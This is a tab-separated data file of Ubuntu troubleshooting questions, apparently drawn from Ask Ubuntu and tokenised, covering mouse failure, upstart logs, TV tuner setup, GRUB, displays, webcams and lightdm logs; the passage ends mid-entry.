396928	mouse stopped working completely	we have a desktop running ubuntu 13.10 as a sort of home theater . one day , literally in the middle of usage the mouse stopped working and has n't worked since . i was moving it to click on something and it stopped halfway through . we 've tried other ( working ) mice with no change . restarted many many times . we do n't really have anything special running on it , we only really use it for netflix and spotify and the occasional dvd . what could be wrong ? thanks !
396929	is there a way to tell upstart to log service ?	in the logs directory i do n't see a log file for my app ( with a conf file nomilkforme.conf ) : z @ ubuntu : /var/log/upstart $ ls console-setup.log.1.gz container-detect.log.1.gz module-init-tools.log.1.gz networking.log.1.gz network-interface-eth0.log.1.gz procps.log.1.gz procps-static-network-up.log.1.gz procps-virtual-filesystems.log.1.gz rsyslog.log.1.gz ureadahead.log.1.gz ureadahead-other.log.1.gz is there a way to tell upstart to create a nomilkforme.log ?
396930	setting up tv cards and importing channels in mythtv	i 've been trying to setup any one of my 3 tv cards with mythbuntu for the past two days and i really could do with some help ... . i 'm also a complete noob when it comes to ubuntu/linux . what i have : mythbuntu 12.04.3 hauppauge_wintv-hvr-4000 hauppauge_wintv-nova-hd-s2 tbs 6984 dvb-s2 note : i 'm only trying one card at a time then giving up and re-installing . i installed the firmware using : sudo apt-get install linux-firmware-nonfree mythtv wo n't scan for any channels with any of the cards . however if i run the below i can see all the available channels in the terminal : sudo apt-get update sudo apt-get install dvb-apps mplayer scan -x0 /usr/share/dvb/dvb-s/astra-28.2e | tee channels.conf i then try to import the channels with the channels.conf using the below but that does n't work either : sudo service mythtv-backend stop scan /usr/share/dvb/dvb-s/astra-28.2e > channels.conf when looking at the terminal whilst i 'm trying to import the .conf file i get : mythtv fe_get_info ioctl failed ( /dev/dvb/adaptor0/frontend0 ) eno : no such device ( 19 ) and when in mythtv setup and i try to configure a capture card using 'dvb dtv capture card ( v3.x ) ' my front end reports : could not get card info for car /dev/dvb/adaptor0/frontend0 subtype : unknown error any help would be greatly appreciated as i 'm just going round in circles and i 've exhausted all my google search terms .
396931	set xdg cache for chromium	i want to use the xdg standard to export chromium 's cache to /tmp/chromium , which i 've mounted in ram . i 'll do this with a script in /etc/profile.d . but the contents of the file i do n't know . if i add export xdg_cache_home= '' < destination > '' that moves the entire ~/.cache folder , correct ? i want only chromium 's cache to be moved . how can i do this ?
396932	i can not open software center	this is what showing me : systemerror : e : encountered a section with no package : header , e : problem with mergelist /var/lib/apt/lists/download.jitsi.org_deb_unstable_packages , e : the package lists or status file could not be parsed or opened . how to solve this ?
396933	ubuntu 13.10 custom keyboard layout	using ubuntu 13.10 , i want the prtsc key to work as menu on lenovo s430 keyboard . on 13.04 this was possible with modified .xmodmap file , see ubuntu 13.04 custom keyboard layout this solution does not work any more .
396935	bootloading problems after partition	i used a linux live usb key to install ubuntu 12.04 along side another ubuntu 12.04 . after successful installation , it did n't show any boot choosing screen , and booted directly in my old os . so i installed from my old os grub boot repair ( which told me something with `` efi '' detected ) . now i have a grub version 1.99-21 ubuntu 3.14 boot screen where i 've to enter : linux /vmlinuz root=/dev/sda2 initrd /initrd.img boot to be able to boot into the partitions i want . i tried to `` upgrade '' to grub2 using sudo apt-get install grub-pc and following the instructions . although everything seems to work ok nothing is changed on reboot . can anyone tell me what to do to have some decent boot choosing screen ? by the way wifi is not working on the new partition but is working on the old one , any clues ? ( i will try to update via ethernet and see if it helps )
396938	how do i make sublime text 3 the default text editor	i 'd like to replace gedit , and use sublime text 3 as my default text editor for all text files on my ubuntu system . can you let me know how do i go about making this change ?
396939	removing remains of lubuntu-desktop also removed kubuntu-desktop	i 've converted lubuntu to kubuntu by installing kubuntu-desktop . after do-release-upgrade i removed the remains of lubuntu using the following command : sudo apt-get purge -- auto-remove abiword abiword-common abiword-plugin-grammar abiword-plugin-mathview ace-of-penguins audacious audacious-plugins audacious-plugins-data blueman chromium-browser chromium-browser-l10n chromium-codecs-ffmpeg elementary-icon-theme esound-common galculator gdebi gdebi-core gecko-mediaplayer giblib1 gnome-icon-theme-full gnome-mplayer gnome-system-tools gnome-time-admin gnumeric gnumeric-common gnumeric-doc gpicview gtk2-engines-pixbuf guvcview hardinfo leafpad libaacs0 libabiword-2.9 libaudclient2 libaudcore1 libaudiofile1 libbinio1ldbl libbluray1 libbs2b0 libcddb2 libcompfaceg1 libcue1 libencode-locale-perl libept1.4.12 libesd0 libexo-1-0 libexo-common libexo-helpers libfile-listing-perl libfluidsynth1 libfm-data libfm-gtk-data libfont-afm-perl libgdome2-0 libgdome2-cpp-smart0c2a libglade2-0 libgoffice-0.8-8 libgoffice-0.8-8-common libgringotts2 libgsf-1-114 libgsf-1-common libgtkmathview0c2a libguess1 libhtml-form-perl libhtml-format-perl libhtml-parser-perl libhtml-tagset-perl libhtml-tree-perl libhttp-cookies-perl libhttp-daemon-perl libhttp-date-perl libhttp-message-perl libhttp-negotiate-perl libid3tag0 libimlib2 libio-socket-inet6-perl libio-socket-ssl-perl libjpeg-progs libjpeg-turbo-progs liblink-grammar4 libloudmouth1-0 liblwp-mediatypes-perl liblwp-protocol-https-perl libmailtools-perl libmcrypt4 libmowgli2 libmpg123-0 libnet-dbus-perl libnet-http-perl libnet-ssleay-perl libobrender27 libobt0 libonig2 liboobs-1-5 libopts25 libots0 libpisock9 libresid-builder0c2a libsidplay2 libsocket6-perl libtar0 libtidy-0.99-0 libtie-ixhash-perl libtimedate-perl libuniconf4.6 liburi-perl libvdpau1 libwebcam0 libwv-1.2-4 libwvstreams4.6-base libwvstreams4.6-extras libwww-perl libwww-robotrules-perl libxfce4ui-1-0 libxfce4util-bin libxfce4util-common libxfconf-0-2 libxml-parser-perl libxml-twig-perl libxml-xpath-perl libxss1 lightdm-gtk-greeter link-grammar-dictionaries-en lm-sensors lubuntu-artwork lubuntu-artwork-12-04 lubuntu-core lubuntu-default-settings lubuntu-desktop lubuntu-icon-theme lubuntu-software-center lxappearance lxappearance-obconf lxinput lxkeymap lxlauncher lxmenu-data lxpanel lxpanel-indicator-applet-plugin lxrandr lxsession lxsession-edit lxshortcut lxtask lxterminal mplayer2 mtpaint ntp obconf openbox openbox-themes osmo pcmanfm pidgin pidgin-data pidgin-libnotify pidgin-microblog plymouth-theme-lubuntu-logo plymouth-theme-lubuntu-text python-pysqlite2 python-xklavier scrot sylpheed sylpheed-doc sylpheed-i18n sylpheed-plugins synaptic system-tools-backends transmission ttf-lyx uvcdynctrl uvcdynctrl-data wvdial xfburn xfce-keyboard-shortcuts xfce4-power-manager xfce4-power-manager-data xfconf xfonts-100dpi xpad xscreensaver xscreensaver-data i do n't know why , but this also removed every package installed with kde . everything was fine after reinstalling kubuntu-desktop , but it seems still strange to me . why did this happen ?
396940	found 'solutions ' to `` can not find -lcrypto '' are not working for me	i am forced to install ubuntu in order to install https : //github.com/znort987/blockparser however , when running 'make ' i am encountering this : $ make lnk -- parser /usr/bin/ld : can not find -lcrypto /usr/bin/ld : skipping incompatible /usr/lib/gcc/i686-linux-gnu/4.6/libstdc++.so when searching for -lstdc++ /usr/bin/ld : skipping incompatible /usr/lib/gcc/i686-linux-gnu/4.6/libstdc++.a when searching for -lstdc++ /usr/bin/ld : can not find -lstdc++ collect2 : ld returned 1 exit status make : * [ parser ] error 1 i did one or two laps around the internet and the typical suggestion is to apt-get install libssl-dev , but i have already done this : $ sudo apt-get install libssl-dev reading package lists ... done building dependency tree reading state information ... done libssl-dev is already the newest version . 0 upgraded , 0 newly installed , 0 to remove and 1 not upgraded . i am running 12.04.3 ( precise ) . when i try to compile it with g++ , as suggested ( for example ) by : http : //stackoverflow.com/questions/5329638/usr-bin-ld- can not -find i get other errors : parser.cpp:2:18 : fatal error : util.h : no such file or directory ( util.h is there in the folder ) so i 'm hoping that the make error is easier to solve than the compile errors . thank you guys for your help so far ( was having issues with the grub loader last night ; you guys did help with that ) , but i could use some more help . i am still new to ubuntu i guess .
396945	how do i get a 4k monitor on displayport 1.2 to show as one screen ?	i 've just picked up a up2414q and i 've connected it via displayport 1.2 which runs 60hz . the issue is that it ends up showing x two screens , well kind of , so that i end up with it acting as if i 've got two monitors within my one 24 '' frame . i 've gone through the nvidia settings and can not find a way to get them to join up as a single wide display . i 've found hints at doing things like option `` twinviewxineramainfooverride '' `` 3840x2160+0+0 '' or option `` notwinviewxineramainfo '' `` 1 '' neither of which worked . i wonder if i 'm missing another part to the puzzle . any hints on how to correct up my config would be appreciated . i 'm currently running a new daily build of trusty in the hopes that more recent x and nvidia drivers would help things out . i 've pasted below my current x config and linked to the x log below . here is a screenshot of the current dual display setup . notice the window manager is acting as if there are two different monitors . http : //uploads.mitechie.com/xorg-setup.png logfile : http : //paste.ubuntu.com/6654719/ xrandr output : http : //paste.ubuntu.com/6669699/ # nvidia-settings : x configuration file generated by nvidia-settings # nvidia-settings : version 331.20 ( buildd @ batsu ) mon dec 9 17:08:08 utc 2013 xdpyinfo -ext xinerama | tail -2 head # 0 : 1920x2160 @ 0,0 head # 1 : 1920x2160 @ 1920,0 xorg.conf section `` serverlayout '' identifier `` layout0 '' screen 0 `` screen0 '' 0 0 inputdevice `` keyboard0 '' `` corekeyboard '' inputdevice `` mouse0 '' `` corepointer '' option `` xinerama '' `` 0 '' endsection section `` files '' endsection section `` inputdevice '' # generated from default identifier `` mouse0 '' driver `` mouse '' option `` protocol '' `` auto '' option `` device '' `` /dev/psaux '' option `` emulate3buttons '' `` no '' option `` zaxismapping '' `` 4 5 '' endsection section `` inputdevice '' # generated from default identifier `` keyboard0 '' driver `` kbd '' endsection section `` monitor '' # horizsync source : edid , vertrefresh source : edid identifier `` monitor0 '' vendorname `` unknown '' modelname `` dell up2414q '' horizsync 31.0 - 140.0 vertrefresh 29.0 - 75.0 option `` dpms '' endsection section `` device '' identifier `` device0 '' driver `` nvidia '' vendorname `` nvidia corporation '' boardname `` geforce gtx 660 ti '' endsection section `` screen '' # removed option `` metamodes '' `` dp-1.8 : 1920x2160_60 +1920+0 , dp-1.9 : 1920x2160_60 +0+0 '' identifier `` screen0 '' device `` device0 '' monitor `` monitor0 '' defaultdepth 24 option `` stereo '' `` 0 '' option `` nvidiaxineramainfoorder '' `` dfp-4.8 '' option `` metamodes '' `` dp-1.8 : nvidia-auto-select +1920+0 , dp-1.9 : nvidia-auto-select +0+0 '' option `` sli '' `` off '' option `` multigpu '' `` off '' option `` basemosaic '' `` off '' subsection `` display '' depth 24 endsubsection endsection references : http : //en.wikipedia.org/wiki/4k_resolution
396947	videos in ubuntu /windows xp	i am running dell dim 3000 with built in intel 82865g graphics controller , dual boot ubuntu 12.04 and windows xp . when viewing you tube videos on xp everything looks normal but on ubuntu 12.04 every thing is green and weird looking . if i check for additional drivers in ubuntu , i get none returned . any fix for this ?
396948	wine wo n't let me run league of legends	the wine windows crashes right away after it opens . ( i see the blue screen of the wine virtual environment , but after a few seconds it gets shut without saying anything . )
396949	how to make an executable file appear in search	i 've downloaded a program and in order to run it i open terminal , cd into the directory it 's stored in and run it by typing ./ < program > . this is a bit of a hassle as i use this program on a daily basis . how do i set it so that i can find the program by typing the name of the program ( teamspeak ) into search when i press the super key ?
396950	tabletpc : os selection in grub using volume and windows buttons	i 've bought an acer p3-171 tablet and installed ubuntu precise pangolin alongside with windows on it . unfortunately , i only can choose the os to boot using an external hardware keyboard . i am a realist and i do not expect grub to support touchscreen in observable future . however , os selection using the only three hardware buttons available ( volume up , volume down and windows ) looks totally feasible to me . before i download grub source codes and start messing with them , i want to be sure i 'm not going to reinvent the wheel . does anyone of you know if such feature has already been implemented ? thank you in advance for your answers .
396951	server installation gets stuck on purple screen	i am attempting to install ubuntu server 13.10 amd64 . however , once i tell it my keyboard layout , it pops up a progress bar about scanning cd for a fraction of a second , then i just get a purple screen with the grey bar at the bottom . i can type into the bar , but otherwise it seems to be unresponsive . i tried this installation several times using different ( windows ) tools to put the image onto a 8gb usb2 memory stick i have . i also tried this with 2 different usb sticks ( a cheap lexar and a corsair voyager ) , which both fail in the same way . if i , from the boot menu , attempt to verify it , they both fail on the same file , however taking the md5 of the .iso i used i get the same md5 as from http : //releases.ubuntu.com/saucy/md5sums . ./pool/main/linux/firewire-core-modules-3.11.0-12-generic-di_3.11.0.0-12.19_amd64.udeb system hardware : cpu : amd phenom ii x2 ( not sure on exact model ) motherboard : gigabyte ga-870a-ud3 ( no integrated graphics ) . ram : 4gb ( 2x2gb 1333mhz cl9 in 1st and 3rd slot ) primary drive : 128gb sata3 ssd . connected to the sata3_0 port . this is a brand new - drive , never formatted . gpu : amd hd 5450 ( since there is no integrated graphics , and i needed to be able to see the bios and installation screens ) . keyboard : ps2 keyboard , i could not get a usb keyboard to work once into the installer , although it works up until the point of the ubuntu installer . bios config : default except the sata mode is set to ahci . i found some suggestions to set nomodeset before installation , however this had no effect for me . as for the file verification error , i am really not sure ( i found this , but it has no useful answer corrupted iso image ) . update : i noticed the md5sum.txt in the usb root has the md5 for each individual file easily viewable . i took the md5 of the file it claimed to be corrupted and it matched the value in this file , so i do not understand why the integrity test said this file failed each time ... update2 : i managed to borrow an old dvd rom and burned the iso to a dvd . the integrity check does now pass , but it gets stuck at the exact same place during installation ...
396952	how to change the default webcam ? changing dfaults in multimedia selctor not working	i have logitech c920 set up . with help from an experienced askubuntu user , i installed guvcview , video4 linux control panel , and qt v4l2 utility tester on here . i am able to change from my toshiba 's built in webcam to my external webcam using guvcview . however , when i start a videochat on google hangouts , it automatically selects my built in laptop camera as default . i would like to change my default settings to always use external camera , but i ca n't find where this option is . i 'm running windows 7 and ubuntu 12.04 lts on toshiba satellite l755 memory : 3.8 gib processor : intel® core™ i5-2410m cpu @ 2.30ghz × 4 graphics : intel® sandybridge mobile os-type 64bit disk : 40.2 gb edit : i tried gstreamer-properties in terminal and changed default input under video to logitech external cam . still no luck . when i `` test '' i get no picture , and still get laptop cam when i open guvc . 2nd edit : after installing multi media selector in terminal , i was still not able to find it in dash . here 's the readout after running command : reading package lists ... done building dependency tree reading state information ... done gconf-service is already the newest version . gconf-service set to manually installed . gconf2 is already the newest version . gconf2 set to manually installed . libatk1.0-0 is already the newest version . libatk1.0-0 set to manually installed . libgconf-2-4 is already the newest version . libgconf-2-4 set to manually installed . libgnome-media-profiles-3.0-0 is already the newest version . libgnome-media-profiles-3.0-0 set to manually installed . libgstreamer0.10-0 is already the newest version . libgstreamer0.10-0 set to manually installed . dpkg is already the newest version . gnome-media is already the newest version . gstreamer0.10-gconf is already the newest version . gstreamer0.10-gconf set to manually installed . gstreamer0.10-plugins-base is already the newest version . gstreamer0.10-plugins-base set to manually installed . gstreamer0.10-plugins-good is already the newest version . gstreamer0.10-plugins-good set to manually installed . libc6 is already the newest version . libglib2.0-0 is already the newest version . libgstreamer-plugins-base0.10-0 is already the newest version . libgstreamer-plugins-base0.10-0 set to manually installed . libgtk-3-0 is already the newest version . libgtk-3-0 set to manually installed . x11-utils is already the newest version . x11-utils set to manually installed . the following packages were automatically installed and are no longer required : gir1.2-ubuntuoneui-3.0 linux-headers-3.2.0-54 libubuntuoneui-3.0-1 thunderbird-globalmenu linux-headers-3.2.0-54-generic use 'apt-get autoremove ' to remove them . 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . if i run gstreamer-properties in terminal i get the multimedia selector . i change default input to external , the blue light on external cam lights up ( when i press `` test '' ) , but no picture . here 's a screenshot of setings 3rd edit : after running it as root with sudo gstreamer-properties i changed default input to hd webcam ( same settings as previous screenshot ) and stil when i open guvc it opens as laptop camera . here is what the readout was after running sudo ( gstreamer-properties:15236 ) : gtk-warning ** : unknown property : gtkdialog.has-separator ( gstreamer-properties:15236 ) : gtk-warning ** : unknown property : gtkdialog.has-separator gstreamer-properties-message : skipping unavailable plugin 'artsdsink' gstreamer-properties-message : skipping unavailable plugin 'esdsink' gstreamer-properties-message : skipping unavailable plugin 'sunaudiosink' gstreamer-properties-message : skipping unavailable plugin 'glimagesink' gstreamer-properties-message : skipping unavailable plugin 'sdlvideosink' gstreamer-properties-message : skipping unavailable plugin 'v4lmjpegsrc' gstreamer-properties-message : skipping unavailable plugin 'qcamsrc' gstreamer-properties-message : skipping unavailable plugin 'v4lsrc' gstreamer-properties-message : skipping unavailable plugin 'esdmon' gstreamer-properties-message : skipping unavailable plugin 'sunaudiosrc' when i tried to close terminal , it said process still in use . 4th edit , next day : i followed the link below to dumindu 's sudo apt-get install gstreamer-dbus-media-service gstreamer-tools gstreamer0.10-alsa gstreamer0.10-buzztard gstreamer0.10-buzztard-doc gstreamer0.10-crystalhd gstreamer0.10-doc gstreamer0.10-ffmpeg gstreamer0.10-ffmpeg-dbg gstreamer0.10-fluendo-mp3 gstreamer0.10-gconf gstreamer0.10-gnomevfs gstreamer0.10-gnonlin gstreamer0.10-gnonlin-dbg gstreamer0.10-gnonlin-doc gstreamer0.10-hplugins gstreamer0.10-nice gstreamer0.10-packagekit gstreamer0.10-plugins-bad gstreamer0.10-plugins-bad-doc gstreamer0.10-plugins-bad-multiverse gstreamer0.10-plugins-base gstreamer0.10-plugins-base-apps gstreamer0.10-plugins-base-dbg gstreamer0.10-plugins-base-doc gstreamer0.10-plugins-cutter gstreamer0.10-plugins-good gstreamer0.10-plugins-good-doc gstreamer0.10-plugins-ugly gstreamer0.10-plugins-ugly-doc gstreamer0.10-pocketsphinx gstreamer0.10-pulseaudio gstreamer0.10-qapt gstreamer0.10-sdl gstreamer0.10-tools gstreamer0.10-vaapi gstreamer0.10-vaapi-doc gstreamer0.10-x and ran that through terminal . after a few minutes , the script was done and i did not notice any failures or errors ( i 'll put copy below ) . however , when i then ran sudo gstreamer-properties i got the same `` skipping unavailable plugin '' messages as above^ . the default input on multimedia systems selector is set to c920 hd cam , yet i just opened up guvc and it opens laptop camera . here 's the readout after sudo apt get install ... . too many characters , could n't post . here 's half : ad-multiverse_0.10.21-1_amd64.deb ) ... selecting previously unselected package gstreamer0.10-plugins-good-doc . unpacking gstreamer0.10-plugins-good-doc ( from ... /gstreamer0.10-plugins-good-doc_0.10.31-1ubuntu1.2_all.deb ) ... selecting previously unselected package gstreamer0.10-plugins-ugly-doc . unpacking gstreamer0.10-plugins-ugly-doc ( from ... /gstreamer0.10-plugins-ugly-doc_0.10.18.3-1ubuntu1_all.deb ) ... selecting previously unselected package libsphinxbase1 . unpacking libsphinxbase1 ( from ... /libsphinxbase1_0.4.1-0ubuntu4_amd64.deb ) ... selecting previously unselected package libpocketsphinx1 . unpacking libpocketsphinx1 ( from ... /libpocketsphinx1_0.5.1+dfsg1-0ubuntu3_amd64.deb ) ... selecting previously unselected package gstreamer0.10-pocketsphinx . unpacking gstreamer0.10-pocketsphinx ( from ... /gstreamer0.10-pocketsphinx_0.5.1+dfsg1-0ubuntu3_amd64.deb ) ... selecting previously unselected package libattica0.3 . unpacking libattica0.3 ( from ... /libattica0.3_0.3.0-0ubuntu2_amd64.deb ) ... selecting previously unselected package libdlrestrictions1 . unpacking libdlrestrictions1 ( from ... /libdlrestrictions1_0.14.2ubuntu5_amd64.deb ) ... selecting previously unselected package libkdecore5 . unpacking libkdecore5 ( from ... /libkdecore5_4 % 3a4.8.5-0ubuntu0.2_amd64.deb ) ... selecting previously unselected package libkdeui5 . unpacking libkdeui5 ( from ... /libkdeui5_4 % 3a4.8.5-0ubuntu0.2_amd64.deb ) ... selecting previously unselected package libkcmutils4 . unpacking libkcmutils4 ( from ... /libkcmutils4_4 % 3a4.8.5-0ubuntu0.2_amd64.deb ) ... selecting previously unselected package libkdeclarative5 . unpacking libkdeclarative5 ( from ... /libkdeclarative5_4 % 3a4.8.5-0ubuntu0.2_amd64.deb ) ... selecting previously unselected package libkpty4 . unpacking libkpty4 ( from ... /libkpty4_4 % 3a4.8.5-0ubuntu0.2_amd64.deb ) ... selecting previously unselected package libkdesu5 . unpacking libkdesu5 ( from ... /libkdesu5_4 % 3a4.8.5-0ubuntu0.2_amd64.deb ) ... selecting previously unselected package libclucene0ldbl . unpacking libclucene0ldbl ( from ... /libclucene0ldbl_0.9.21b-2_amd64.deb ) ... selecting previously unselected package virtuoso-opensource-6.1-common . unpacking virtuoso-opensource-6.1-common ( from ... /virtuoso-opensource-6.1-common_6.1.4+dfsg1-0ubuntu1_amd64.deb ) ... selecting previously unselected package libvirtodbc0 . unpacking libvirtodbc0 ( from ... /libvirtodbc0_6.1.4+dfsg1-0ubuntu1_amd64.deb ) ... selecting previously unselected package soprano-daemon . unpacking soprano-daemon ( from ... /soprano-daemon_2.7.5+dfsg.1-0ubuntu1_amd64.deb ) ... selecting previously unselected package libsoprano4 . unpacking libsoprano4 ( from ... /libsoprano4_2.7.5+dfsg.1-0ubuntu1_amd64.deb ) ... selecting previously unselected package libnepomuk4 . unpacking libnepomuk4 ( from ... /libnepomuk4_4 % 3a4.8.5-0ubuntu0.2_amd64.deb ) ... selecting previously unselected package libsolid4 . unpacking libsolid4 ( from ... /libsolid4_4 % 3a4.8.5-0ubuntu0.2_amd64.deb ) ... selecting previously unselected package libstreams0 . unpacking libstreams0 ( from ... /libstreams0_0.7.7-1.1ubuntu3_amd64.deb ) ... selecting previously unselected package libstreamanalyzer0 . unpacking libstreamanalyzer0 ( from ... /libstreamanalyzer0_0.7.7-1.1ubuntu3_amd64.deb ) ... selecting previously unselected package libkio5 . unpacking libkio5 ( from ... /libkio5_4 % 3a4.8.5-0ubuntu0.2_amd64.deb ) ... selecting previously unselected package libnepomukquery4a . unpacking libnepomukquery4a ( from ... /libnepomukquery4a_4 % 3a4.8.5-0ubuntu0.2_amd64.deb ) ... selecting previously unselected package libnepomukutils4 . unpacking libnepomukutils4 ( from ... /libnepomukutils4_4 % 3a4.8.5-0ubuntu0.2_amd64.deb ) ... selecting previously unselected package libkparts4 . unpacking libkparts4 ( from ... /libkparts4_4 % 3a4.8.5-0ubuntu0.2_amd64.deb ) ... selecting previously unselected package libkdewebkit5 . unpacking libkdewebkit5 ( from ... /libkdewebkit5_4 % 3a4.8.5-0ubuntu0.2_amd64.deb ) ... selecting previously unselected package libkdnssd4 . unpacking libkdnssd4 ( from ... /libkdnssd4_4 % 3a4.8.5-0ubuntu0.2_amd64.deb ) ... selecting previously unselected package libkemoticons4 . unpacking libkemoticons4 ( from ... /libkemoticons4_4 % 3a4.8.5-0ubuntu0.2_amd64.deb ) ... selecting previously unselected package libkfile4 . unpacking libkfile4 ( from ... /libkfile4_4 % 3a4.8.5-0ubuntu0.2_amd64.deb ) ... selecting previously unselected package libkjsapi4 . unpacking libkjsapi4 ( from ... /libkjsapi4_4 % 3a4.8.5-0ubuntu0.2_amd64.deb ) ... selecting previously unselected package libktexteditor4 . unpacking libktexteditor4 ( from ... /libktexteditor4_4 % 3a4.8.5-0ubuntu0.2_amd64.deb ) ... selecting previously unselected package libkhtml5 . unpacking libkhtml5 ( from ... /libkhtml5_4 % 3a4.8.5-0ubuntu0.2_amd64.deb ) ... selecting previously unselected package libkidletime4 . unpacking libkidletime4 ( from ... /libkidletime4_4 % 3a4.8.5-0ubuntu0.2_amd64.deb ) ... selecting previously unselected package libkmediaplayer4 . unpacking libkmediaplayer4 ( from ... /libkmediaplayer4_4 % 3a4.8.5-0ubuntu0.2_amd64.deb ) ... selecting previously unselected package libknewstuff3-4 . unpacking libknewstuff3-4 ( from ... /libknewstuff3-4_4 % 3a4.8.5-0ubuntu0.2_amd64.deb ) ... selecting previously unselected package libknotifyconfig4 . unpacking libknotifyconfig4 ( from ... /libknotifyconfig4_4 % 3a4.8.5-0ubuntu0.2_amd64.deb ) ... selecting previously unselected package libnepomukdatamanagement4 . unpacking libnepomukdatamanagement4 ( from ... /libnepomukdatamanagement4_4 % 3a4.8.5-0ubuntu0.2_amd64.deb ) ... selecting previously unselected package libnepomuksync4 . unpacking libnepomuksync4 ( from ... /libnepomuksync4_4 % 3a4.8.5-0ubuntu0.2_amd64.deb ) ... selecting previously unselected package ntrack-module-libnl-0 . unpacking ntrack-module-libnl-0 ( from ... /ntrack-module-libnl-0_016-1ubuntu1_amd64.deb ) ... selecting previously unselected package libntrack0 . unpacking libntrack0 ( from ... /libntrack0_016-1ubuntu1_amd64.deb ) ... selecting previously unselected package libntrack-qt4-1 . unpacking libntrack-qt4-1 ( from ... /libntrack-qt4-1_016-1ubuntu1_amd64.deb ) ... selecting previously unselected package libqca2 . unpacking libqca2 ( from ... /libqca2_2.0.3-2_amd64.deb ) ... selecting previously unselected package libthreadweaver4 . unpacking libthreadweaver4 ( from ... /libthreadweaver4_4 % 3a4.8.5-0ubuntu0.2_amd64.deb ) ... selecting previously unselected package libplasma3 . unpacking libplasma3 ( from ... /libplasma3_4 % 3a4.8.5-0ubuntu0.2_amd64.deb ) ... selecting previously unselected package phonon . unpacking phonon ( from ... /phonon_4 % 3a4.7.0really4.6.0-0ubuntu1_amd64.deb ) ... selecting previously unselected package kde-runtime-data . unpacking kde-runtime-data ( from ... /kde-runtime-data_4 % 3a4.8.5-0ubuntu0.2_all.deb ) ... selecting previously unselected package libkde3support4 . unpacking libkde3support4 ( from ... /libkde3support4_4 % 3a4.8.5-0ubuntu0.2_amd64.deb ) ... selecting previously unselected package libkjsembed4 . unpacking libkjsembed4 ( from ... /libkjsembed4_4 % 3a4.8.5-0ubuntu0.2_amd64.deb ) ... selecting previously unselected package libkntlm4 . unpacking libkntlm4 ( from ... /libkntlm4_4 % 3a4.8.5-0ubuntu0.2_amd64.deb ) ... selecting previously unselected package libkrosscore4 . unpacking libkrosscore4 ( from ... /libkrosscore4_4 % 3a4.8.5-0ubuntu0.2_amd64.deb ) ... selecting previously unselected package libpolkit-qt-1-1 . unpacking libpolkit-qt-1-1 ( from ... /libpolkit-qt-1-1_0.103.0-1_amd64.deb ) ... selecting previously unselected package kdelibs5-data . unpacking kdelibs5-data ( from ... /kdelibs5-data_4 % 3a4.8.5-0ubuntu0.2_all.deb ) ... selecting previously unselected package libxml2-utils . unpacking libxml2-utils ( from ... /libxml2-utils_2.7.8.dfsg-5.1ubuntu4.6_amd64.deb ) ... selecting previously unselected package kdoctools . unpacking kdoctools ( from ... /kdoctools_4 % 3a4.8.5-0ubuntu0.2_amd64.deb ) ... selecting previously unselected package kdelibs-bin . unpacking kdelibs-bin ( from ... /kdelibs-bin_4 % 3a4.8.5-0ubuntu0.2_amd64.deb ) ... selecting previously unselected package kate-data . unpacking kate-data ( from ... /kate-data_4 % 3a4.8.5-0ubuntu0.1_all.deb ) ... selecting previously unselected package libkatepartinterfaces4 . unpacking libkatepartinterfaces4 ( from ... /libkatepartinterfaces4_4 % 3a4.8.5-0ubuntu0.1_amd64.deb ) ... selecting previously unselected package katepart . unpacking katepart ( from ... /katepart_4 % 3a4.8.5-0ubuntu0.1_amd64.deb ) ... selecting previously unselected package kdelibs5-plugins . unpacking kdelibs5-plugins ( from ... /kdelibs5-plugins_4 % 3a4.8.5-0ubuntu0.2_amd64.deb ) ... selecting previously unselected package oxygen-icon-theme . unpacking oxygen-icon-theme ( from ... /oxygen-icon-theme_4 % 3a4.8.3-0ubuntu0.1_all.deb ) ... selecting previously unselected package shared-desktop-ontologies . unpacking shared-desktop-ontologies ( from ... /shared-desktop-ontologies_0.8.1-1_all.deb ) ... just wanted to double check in ubuntu software center to make sure gstreamer was installed , and it shows everything installed mike @ mike-ubuntu12 : ~ $ lsusb bus 001 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 002 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 001 device 003 : id 04f2 : b289 chicony electronics co. , ltd bus 002 device 003 : id 046d:082d logitech , inc. mike @ mike-ubuntu12 : ~ $ lsusb -t / : bus 02.port 1 : dev 1 , class=root_hub , driver=ehci-pci/2p , 480m |__ port 1 : dev 2 , if 0 , class=hub , driver=hub/6p , 480m |__ port 2 : dev 3 , if 0 , class='binterfaceclass 0x0e not yet handled ' , driver=uvcvideo , 480m |__ port 2 : dev 3 , if 1 , class='binterfaceclass 0x0e not yet handled ' , driver=uvcvideo , 480m |__ port 2 : dev 3 , if 2 , class=audio , driver=snd-usb-audio , 480m |__ port 2 : dev 3 , if 3 , class=audio , driver=snd-usb-audio , 480m / : bus 01.port 1 : dev 1 , class=root_hub , driver=ehci-pci/2p , 480m |__ port 1 : dev 2 , if 0 , class=hub , driver=hub/6p , 480m |__ port 4 : dev 3 , if 0 , class='binterfaceclass 0x0e not yet handled ' , driver=uvcvideo , 480m |__ port 4 : dev 3 , if 1 , class='binterfaceclass 0x0e not yet handled ' , driver=uvcvideo , 480m
396956	app runner 0.5.2 not working with ubuntu13.10	i just started to experiment with ubuntu 13.10 , and i installed the app runner 0.5.2 from the software center , but when i right click a file the `` send/script '' option does n't show up . is this version of the runner compatible with 13.10 ? and if so , what i am doing wrong , or what do i have to setup ?
396957	meaning of files in /var/log/lightdm/ and how to properly read lightdm.log file ?	tracking the slowdowns in the system , i was advised to check the files in the folder /var/log/lightdm/ . there i see 4 files as on the image . what logs are recorded in each of them ? the other question is how to properly read file lightdm.log ? it 's content looks like this [ +0.00s ] debug : logging to /var/log/lightdm/lightdm.log [ +0.00s ] debug : starting light display manager 1.8.4 , uid=0 pid=1155 [ +0.00s ] debug : loading configuration from /etc/lightdm/lightdm.conf.d/10-ubuntu.conf [ +0.00s ] debug : loading configuration from /etc/lightdm/lightdm.conf.d/50-greeter-wrapper.conf [ +0.00s ] debug : loading configuration from /etc/lightdm/lightdm.conf.d/50-guest-wrapper.conf [ +0.00s ] debug : loading configuration from /etc/lightdm/lightdm.conf.d/50-unity-greeter.conf [ +0.00s ] debug : loading configuration from /etc/lightdm/lightdm.conf.d/50-xserver-command.conf [ +0.00s ] debug : loading configuration from /etc/lightdm/lightdm.conf [ +0.00s ] debug : using d-bus name org.freedesktop.displaymanager [ +0.00s ] debug : registered seat module xlocal ... [ +4.52s ] debug : session 